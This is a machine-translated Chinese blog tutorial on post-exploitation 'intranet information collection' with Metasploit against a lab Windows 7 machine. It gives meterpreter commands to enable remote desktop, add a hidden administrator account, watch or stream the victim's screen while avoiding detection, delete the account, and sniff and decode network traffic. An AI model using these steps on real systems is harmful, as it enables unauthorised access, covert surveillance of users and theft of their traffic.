当前位置:网站首页>Intranet information collection of Intranet penetration (2)
Intranet information collection of Intranet penetration (2)
2022-07-06 14:17:00 【Unknown white hat】
Catalog
Metasploit Intranet information collection
Metasploit Intranet information collection
attack kali 192.168.0.103
Drone aircraft win7 192.168.0.105
05 Open and connect 3389
see 3389 Port opening
Turn on 3389 Remote desktop
run post/windows/manage/enable_rdp
run getgui -e
You can use this command to add users on the target machine :
run getgui -u admin -p [email protected]( Some system passwords have to meet the complexity to create )
net localgroup administrators admin /add( take admin Users are added to the administrators group )
Remote connection to desktop
rdesktop -u username -p password ip
yes And then it's going to pop up GUI page ( If the user is not added to the administrator group, you cannot log in )
After logging in, you will be prompted to close win7( So we should observe whether the target plane is used in advance , In order to avoid being perceived by users to be attacked )
View remote desktop
screenshot( Intercept win7 Current screen , Check whether someone is using )
use espia
screengrab
screenshare( Get... In real time win7 The screen , Similar to the video style open in the browser )
Delete the specified account
run post/windows/manage/delete_user USERNAME=admin
06 Packet capture
Grab the bag
Load sniffer
Sniffer_interfaces
Sniffer_start 2
Sniffer_dump 2 1.cap
decode
Use auxiliary/sniffer/psnuffle
Set PCAPFILE 1.cap
exploit
边栏推荐
- HackMyvm靶机系列(3)-visions
- 7-5 staircase upgrade (PTA program design)
- Experiment 8 exception handling
- Experiment 7 use of common classes
- 7-15 h0161. Find the greatest common divisor and the least common multiple (PTA program design)
- 7-8 7104 Joseph problem (PTA program design)
- The difference between layer 3 switch and router
- Which is more advantageous in short-term or long-term spot gold investment?
- Package bedding of components
- Yugu p1012 spelling +p1019 word Solitaire (string)
猜你喜欢
Low income from doing we media? 90% of people make mistakes in these three points
Internet Management (Information Collection)
How to turn wechat applet into uniapp
HackMyvm靶机系列(3)-visions
记一次,修改密码逻辑漏洞实战
Hackmyvm target series (2) -warrior
Intranet information collection of Intranet penetration (I)
Only 40% of the articles are original? Here comes the modification method
On the idea of vulnerability discovery
sqqyw(淡然点图标系统)漏洞复现和74cms漏洞复现
随机推荐
Web vulnerability - File Inclusion Vulnerability of file operation
Get started with typescript
实验七 常用类的使用(修正帖)
Attach the simplified sample database to the SQLSERVER database instance
[MySQL database learning]
Force deduction 152 question multiplier maximum subarray
msf生成payload大全
SQL注入
强化学习基础记录
Windows platform mongodb database installation
Network technology related topics
Interpretation of iterator related "itertools" module usage
Tencent map circle
攻防世界MISC练习区(SimpleRAR、base64stego、功夫再高也怕菜刀)
The difference between layer 3 switch and router
7-8 7104 约瑟夫问题(PTA程序设计)
7-14 错误票据(PTA程序设计)
Simply understand the promise of ES6
7-15 h0161. 求最大公约数和最小公倍数(PTA程序设计)
实验七 常用类的使用